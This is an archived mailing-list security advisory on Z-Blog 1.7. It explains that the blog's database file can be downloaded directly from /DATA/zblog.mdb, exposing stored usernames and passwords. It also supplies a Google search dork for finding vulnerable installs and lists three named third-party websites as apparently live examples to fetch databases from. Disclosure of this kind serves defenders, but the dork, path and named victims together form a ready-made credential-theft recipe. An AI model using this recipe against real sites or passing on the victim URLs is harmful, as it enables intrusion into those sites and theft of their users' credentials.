Z-Blog 1.7 Authentication Bypass Database Download Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

 * Author  : Hasadya Raed
 * Contact : RaeD@xxxxxxxxxxx ~>Israel Hacker
 * Greetz  : Fairoz :)
 * Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability 
 * Script   : Z-Blog 1.7            
 * Impact   : Remote 
 * Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
 * Download   : http://bbs.rainbowsoft.org/attachment.php?aid=92


--/ REPRODUCE \--

# Attackers Can Authentication Bypass In This Product By Add The Following Files:
  ('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
  The Users Names And Passwords Inside

--/ Examples \--

http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux